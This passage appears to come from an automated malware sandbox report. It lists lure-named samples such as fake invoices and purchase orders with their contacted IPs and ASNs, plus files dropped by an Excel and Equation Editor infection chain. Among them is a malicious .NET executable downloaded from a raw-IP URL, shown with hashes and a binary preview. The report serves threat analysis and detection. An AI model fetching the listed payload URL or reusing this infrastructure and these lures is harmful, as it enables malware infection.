                                    SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    LOT_20210526.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    Q2MAUt4mRO.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    4fn66P5vkl.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    P_O 00041221.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    LOT_20210526.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    QI5MR3pte0.exeGet hashmaliciousBrowse
                                    • 185.140.53.40
                                    5Em2NXNxSt.exeGet hashmaliciousBrowse
                                    • 185.140.53.40
                                    7Zpsd899Kf.exeGet hashmaliciousBrowse
                                    • 185.140.53.40
                                    LfgEatrwIF.exeGet hashmaliciousBrowse
                                    • 185.140.53.40

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    FINK-TELECOM-SERVICESCHMS2106071066.exeGet hashmaliciousBrowse
                                    • 79.134.225.71
                                    Kangean PO.docGet hashmaliciousBrowse
                                    • 79.134.225.72
                                    facture.jarGet hashmaliciousBrowse
                                    • 79.134.225.69
                                    c3yBu1IF57.exeGet hashmaliciousBrowse
                                    • 79.134.225.92
                                    DPSGNwkO1Z.exeGet hashmaliciousBrowse
                                    • 79.134.225.25
                                    SecuriteInfo.com.Trojan.Win32.Save.a.16917.exeGet hashmaliciousBrowse
                                    • 79.134.225.94
                                    AedJpyQ9lM.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    H538065217Invoice.exeGet hashmaliciousBrowse
                                    • 79.134.225.9
                                    Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    P.I-84512.docGet hashmaliciousBrowse
                                    • 79.134.225.41
                                    l00VLAF9y0xQ9Vr.exeGet hashmaliciousBrowse
                                    • 79.134.225.92
                                    Swift [ref QT #U2013 2102001-R2]pdf.exeGet hashmaliciousBrowse
                                    • 79.134.225.10
                                    PO756654.exeGet hashmaliciousBrowse
                                    • 79.134.225.99
                                    qdFDmi3Bhy.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    br.exeGet hashmaliciousBrowse
                                    • 79.134.225.73
                                    Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                    • 79.134.225.71
                                    as.exeGet hashmaliciousBrowse
                                    • 79.134.225.73
                                    11.exeGet hashmaliciousBrowse
                                    • 79.134.225.40
                                    V8IB839cvz.exeGet hashmaliciousBrowse
                                    • 79.134.225.25
                                    A2PlnLyOA7.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    AS-COLOCROSSINGUSNaro#U010dite 5039066002128.xlsxGet hashmaliciousBrowse
                                    • 192.227.228.121
                                    Proforma Inv.xlsxGet hashmaliciousBrowse
                                    • 192.3.122.169
                                    Payment_Doc.xlsxGet hashmaliciousBrowse
                                    • 107.173.219.35
                                    Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • 198.12.127.155
                                    BBS FX.xlsxGet hashmaliciousBrowse
                                    • 198.12.110.183
                                    e#U03c2.xlsxGet hashmaliciousBrowse
                                    • 192.227.228.121
                                    Zd1j3hnY8u.exeGet hashmaliciousBrowse
                                    • 198.23.140.94
                                    MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                    • 192.210.173.40
                                    yPbGfVkUrS.exeGet hashmaliciousBrowse
                                    • 198.23.140.94
                                    Product_list.xlsxGet hashmaliciousBrowse
                                    • 192.227.158.72
                                    P_O 07062021.xlsxGet hashmaliciousBrowse
                                    • 192.3.13.56
                                    Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                    • 192.210.173.40
                                    Quote SEQTE00311701.xlsxGet hashmaliciousBrowse
                                    • 192.227.158.72
                                    New206745#874645_pdf.exeGet hashmaliciousBrowse
                                    • 192.3.141.183
                                    print PO#6321023.docxGet hashmaliciousBrowse
                                    • 23.95.122.53
                                    print PO#6321023.docxGet hashmaliciousBrowse
                                    • 23.95.122.53
                                    mjzvlwauGet hashmaliciousBrowse
                                    • 23.94.40.0
                                    INVOICE#1191189.xlsxGet hashmaliciousBrowse
                                    • 107.173.219.35
                                    item_list.xlsxGet hashmaliciousBrowse
                                    • 192.227.158.72
                                    _Vm064855583.HtMGet hashmaliciousBrowse
                                    • 23.94.52.94

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Temp\RegAsm.exePurchase Order Price List.xlsxGet hashmaliciousBrowse
                                      Quote QU038097.docGet hashmaliciousBrowse
                                        6Cprm97UTl.xlsGet hashmaliciousBrowse
                                          Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                            Overdue Invoice.xlsxGet hashmaliciousBrowse
                                              Quotation.xlsxGet hashmaliciousBrowse
                                                ENCLOSE ORDER LIST.xlsxGet hashmaliciousBrowse
                                                  PO INV 195167 & 195324.xlsxGet hashmaliciousBrowse
                                                    Bank letter.xlsxGet hashmaliciousBrowse
                                                      Quotation.xlsxGet hashmaliciousBrowse
                                                        PO 19030004.xlsxGet hashmaliciousBrowse
                                                          New PO PO20.xlsxGet hashmaliciousBrowse
                                                            ORDER LIST.xlsxGet hashmaliciousBrowse
                                                              RFQ 00112.xlsxGet hashmaliciousBrowse
                                                                inquiry.xlsxGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe
                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):734208
                                                                  Entropy (8bit):7.833756558737052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
                                                                  MD5:EB43B3C033BD76B51B90A51A6726A81C
                                                                  SHA1:0D39FFCF64ED4F38EA83A72D726D40881F583014
                                                                  SHA-256:4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
                                                                  SHA-512:7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 39%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                  Reputation:low
                                                                  IE Cache URL:http://198.12.127.155/new.exe
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.......*..............@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~*...9p...&8f....:....8....*8....8.......*....(....*..(0...*&~.......*...~....*..0..t........(.... ....~!...:....& ....8....8........E.... .......8....*8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....*~...
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1717583E.jpeg
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                  Category:dropped
                                                                  Size (bytes):8815
                                                                  Entropy (8bit):7.944898651451431
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17662F27.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):79394
                                                                  Entropy (8bit):7.864111100215953
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                  MD5:16925690E9B366EA60B610F517789AF1
                                                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A2B8E08.jpeg
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                  Category:dropped
                                                                  Size (bytes):8815
                                                                  Entropy (8bit):7.944898651451431
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\707074AB.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):49744
                                                                  Entropy (8bit):7.99056926749243
                                                                  Encrypted:true
                                                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81C8EEFC.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):51166
                                                                  Entropy (8bit):7.767050944061069
                                                                  Encrypted:false
                                                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86ABDEF1.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):50311
                                                                  Entropy (8bit):7.960958863022709
                                                                  Encrypted:false
                                                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87A50956.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):51166
                                                                  Entropy (8bit):7.767050944061069
                                                                  Encrypted:false
                                                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D956669.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):79394
                                                                  Entropy (8bit):7.864111100215953
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                  MD5:16925690E9B366EA60B610F517789AF1
                                                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEC1BA6A.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):84203
                                                                  Entropy (8bit):7.979766688932294
                                                                  Encrypted:false
                                                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E476B363.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):50311
                                                                  Entropy (8bit):7.960958863022709
                                                                  Encrypted:false
                                                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8E50EB0.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
